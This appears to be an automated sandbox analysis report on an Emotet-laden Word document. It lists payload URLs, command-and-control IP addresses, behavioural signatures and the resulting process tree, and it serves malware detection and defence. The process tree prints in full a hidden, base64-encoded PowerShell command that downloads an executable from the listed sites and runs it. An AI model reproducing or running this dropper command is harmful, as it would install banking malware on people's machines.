Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
12-12-2019 09:04
General
Malware Config
Extracted
http://theaustinochuks.com/personal_array/kvrmif/
http://sarafifallahi.com/wp-admin/uUXtpLhI/
http://faustosarli.com/wp-admin/mYZW0/
http://janejahan.com/wp-content/hqiw1u9/
http://vikstory.ca/h/f2cgRvw/
Extracted
emotet
110.143.84.202:80
75.80.148.244:80
64.53.242.181:8080
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
206.189.112.148:8080
211.63.71.72:8080
178.210.51.222:8080
92.186.52.193:80
195.244.215.206:80
2.38.99.79:80
37.157.194.134:443
206.81.10.215:8080
80.21.182.46:80
80.11.163.139:21
190.56.255.118:80
190.226.44.20:21
173.70.81.77:80
190.12.119.180:443
120.150.246.241:80
110.142.38.16:80
192.241.255.77:8080
181.31.213.158:8080
178.209.71.63:8080
212.186.191.177:80
85.72.180.68:80
181.57.193.14:80
46.105.131.87:80
12.176.19.218:80
86.98.156.239:443
167.71.10.37:8080
116.48.142.21:443
176.31.200.130:8080
45.51.40.140:80
67.225.179.64:8080
110.143.57.109:80
185.159.102.74:80
1.33.230.137:80
212.64.171.206:80
144.139.247.220:80
165.228.24.197:80
188.152.7.140:80
70.175.171.251:80
165.227.156.155:443
5.196.74.210:8080
182.176.132.213:8090
164.68.101.171:80
149.202.153.252:8080
5.88.182.250:80
62.75.187.192:8080
104.131.44.150:8080
12.229.155.122:80
167.114.242.226:8080
107.2.2.28:80
128.65.154.183:443
31.31.77.83:443
98.24.231.64:80
217.160.182.191:8080
87.106.136.232:8080
218.44.21.114:80
190.53.135.159:21
87.230.19.21:8080
91.231.166.126:8080
186.75.241.230:80
197.254.221.174:80
92.222.216.44:8080
209.97.168.52:8080
100.14.117.137:80
183.102.238.69:465
107.170.24.125:8080
104.131.11.150:8080
103.86.49.11:8080
58.171.42.66:8080
108.191.2.72:80
91.73.197.90:80
66.76.63.99:80
210.6.85.121:80
139.130.241.252:443
201.184.105.242:443
45.33.49.124:443
73.11.153.178:8080
78.24.219.147:8080
24.45.193.161:7080
104.236.246.93:8080
50.116.86.205:8080
31.131.182.30:80
31.172.240.91:8080
101.187.134.207:443
212.129.24.79:8080
91.205.215.66:8080
189.209.217.49:80
73.176.241.255:80
101.187.247.29:80
159.65.25.128:8080
167.99.105.223:7080
190.211.207.11:443
190.147.215.53:22
83.136.245.190:8080
169.239.182.217:8080
176.106.183.253:8080
61.197.110.214:80
93.147.141.5:80
87.106.139.101:8080
104.237.155.168:443
209.141.54.221:8080
181.143.194.138:443
59.103.164.174:80
91.242.138.5:80
74.105.102.97:8080
47.156.70.145:80
200.7.243.108:443
201.173.217.124:443
173.13.135.102:80
95.128.43.213:8080
Signatures
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE511.exe511.exepid process 4864 WINWORD.EXE 4600 511.exe 4528 511.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4036 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4036 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
511.exe511.exepid process 4600 511.exe 4528 511.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
511.exepid process 4528 511.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4864 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4864 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe511.exedescription pid process target process PID 408 wrote to memory of 60 408 SppExtComObj.exe SLUI.exe PID 4036 wrote to memory of 4600 4036 Powershell.exe 511.exe PID 4600 wrote to memory of 4528 4600 511.exe 511.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a173abf8a8a9f3775bc4f197652d1dd5d9271dd89ad1f317958ca152cc2ea6c0.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA7ACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABhAHAAbgBvAHkAZABzAHgAKwAnAC4AZQB4AGUAJwA7ACQAQQBtAHMAeQBiAGMAcgBrAGYAPQAnAEkAYwBmAGsAbgBwAGkAeQAnADsAJABKAG8AawBzAHYAcQB5AHYAeQBtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAGUAbgBUADsAJABKAHUAeABkAHIAaABoAGoAdABpAD0AJwBoAHQAdABwADoALwAvAHQAaABlAGEAdQBzAHQAaQBuAG8AYwBoAHUAawBzAC4AYwBvAG0ALwBwAGUAcgBzAG8AbgBhAGwAXwBhAHIAcgBhAHkALwBrAHYAcgBtAGkAZgAvACoAaAB0AHQAcAA6AC8ALwBzAGEAcgBhAGYAaQBmAGEAbABsAGEAaABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AFUAWAB0AHAATABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgBhAHUAcwB0AG8AcwBhAHIAbABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAFkAWgBXADAALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZQBqAGEAaABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHEAaQB3ADEAdQA5AC8AKgBoAHQAdABwADoALwAvAHYAaQBrAHMAdABvAHIAeQAuAGMAYQAvAGgALwBmADIAYwBnAFIAdgB3AC8AJwAuACIAcwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAEMAZgBnAHEAZQBlAHoAbAA9ACcASQBvAHkAawBtAHAAYwBlAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARAB4AG0AZgB4AHQAYQB1AGUAYwB4AHAAdAAgAGkAbgAgACQASgB1AHgAZAByAGgAaABqAHQAaQApAHsAdAByAHkAewAkAEoAbwBrAHMAdgBxAHkAdgB5AG0ALgAiAEQAbwBgAFcATgBMAG8AQQBkAGYAYABJAGAATABlACIAKAAkAEQAeABtAGYAeAB0AGEAdQBlAGMAeABwAHQALAAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApADsAJABMAGQAdgBvAHMAbABnAHoAcwA9ACcARwB5AGgAbABoAHcAeQByAHkAdQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAzADkAOAAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEwAdABlAHUAdgBzAHEAbQBiAGwAYQBxAGYAKQA7ACQAVgB4AHgAbQBkAG0AYwBpAD0AJwBEAHYAcQBsAG8AZQBsAHUAdAB4AHIAbQAnADsAYgByAGUAYQBrADsAJABWAGkAbwB6AHUAbQBlAGwAPQAnAFgAbgBqAG4AbwBjAG8AeQBkAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGQAdQBqAG0AeQB3AG0AaQA9ACcAUQB2AHgAYwBvAGoAcABzAHUAZwBvAGEAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\511.exe"C:\Users\Admin\511.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\511.exe--a155b8533⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4528-10-0x0000000000680000-0x0000000000697000-memory.dmpFilesize
92KB
-
memory/4528-11-0x0000000000400000-0x000000000048D000-memory.dmpFilesize
564KB
-
memory/4600-7-0x0000000002150000-0x0000000002167000-memory.dmpFilesize
92KB
-
memory/4864-0-0x000002CF5CA80000-0x000002CF5CA81000-memory.dmpFilesize
4KB